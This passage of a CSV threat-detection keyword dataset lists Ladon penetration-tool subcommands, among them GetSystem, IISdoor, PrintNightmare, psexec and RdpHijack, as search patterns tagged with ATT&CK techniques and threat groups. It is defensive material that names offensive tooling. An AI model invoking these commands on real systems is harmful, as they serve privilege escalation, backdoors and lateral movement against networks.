loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FtpDownLoad *",".{0,1000}Ladon\sFtpDownLoad\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FtpServer *",".{0,1000}Ladon\sFtpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon GetDomainIP*",".{0,1000}Ladon\sGetDomainIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon gethtml *",".{0,1000}Ladon\sgethtml\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon GetPipe*",".{0,1000}Ladon\sGetPipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon GetSystem*",".{0,1000}Ladon\sGetSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon IISdoor*",".{0,1000}Ladon\sIISdoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon IISpwd*",".{0,1000}Ladon\sIISpwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon MssqlCmd *",".{0,1000}Ladon\sMssqlCmd\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon netsh *",".{0,1000}Ladon\snetsh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon noping *",".{0,1000}Ladon\snoping\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Open3389*",".{0,1000}Ladon\sOpen3389.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon PowerCat *",".{0,1000}Ladon\sPowerCat\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon PrintNightmare*",".{0,1000}Ladon\sPrintNightmare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon psexec*",".{0,1000}Ladon\spsexec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon QueryAdmin*",".{0,1000}Ladon\sQueryAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RdpHijack*",".{0,1000}Ladon\sRdpHijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon ReadFile *",".{0,1000}Ladon\sReadFile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon RegAuto*",".{0,1000}Ladon\sRegAuto.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 